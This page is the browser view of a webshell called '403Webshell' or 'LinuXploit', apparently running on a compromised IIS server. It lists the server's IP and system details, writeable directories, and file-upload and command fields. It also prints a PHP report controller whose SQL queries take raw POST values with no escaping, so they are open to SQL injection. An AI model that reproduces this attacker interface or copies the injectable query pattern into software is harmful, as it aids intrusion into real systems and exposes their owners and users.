403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Old Sites/modip/infosystem_v7/application/controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Old Sites/modip/infosystem_v7/application/controllers/reports.php
<?php

function internal_report_submit() {

	$id_unit=$_POST["id_unit"];
	$start_year=$_POST["start_year"];
	$edit_year=$_POST["edit_year"];
	$table=$_POST["table"];

	// if(!permission_exists("update_appendix_01_".$table, $id_unit)) {
	if(!permission_exists("view_unit_internal_report", $id_unit)) {
		$_SESSION["error_message"]="Δεν έχετε τα απαραίτητα δικαιώματα να προβάλετε αυτή τη σελίδα.";
		default_page();
		return;
	}

	if($start_year==NULL || $edit_year==NULL) {
		default_page();
		return;
	}


	$field_prefix="t".$table."_";

	$update_string="";
	$insert_string_1="";
	$insert_string_2="";

	$columns_d=query("SHOW columns FROM __appendix_01 WHERE Field LIKE '".$field_prefix."%'");
	while($columns_i=mysql_fetch_array($columns_d)) {
		$update_string.=$columns_i["Field"]."='".$_POST[substr($columns_i["Field"], 4)]."', ";
		$insert_string_1.=$columns_i["Field"].", ";
		$insert_string_2.="'".$_POST[substr($columns_i["Field"], 4)]."', ";
	}

	$row_exists=mysql_num_rows(query("SELECT * FROM __appendix_01 WHERE ref_year='".$edit_year."' AND id_unit='".$id_unit."'"));
	if($row_exists) query("UPDATE __appendix_01 SET ".substr($update_string, 0, -2)." WHERE ref_year='".$edit_year."' AND id_unit='".$id_unit."'");
	else query("INSERT INTO __appendix_01 (ref_year, id_unit, ".substr($insert_string_1, 0, -2).") VALUES ('".$edit_year."', '".$id_unit."', ".substr($insert_string_2, 0, -2).")");
	
	if(mysql_affected_rows()>0) $_SESSION["success_message"]="Επιτυχής επεξεργασία";
	else $_SESSION["error_message"]="Αποτυχία κατά την επεξεργασία ή δεν έγιναν αλλαγές";
	
	internal_report($id_unit, $table, $start_year);
}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit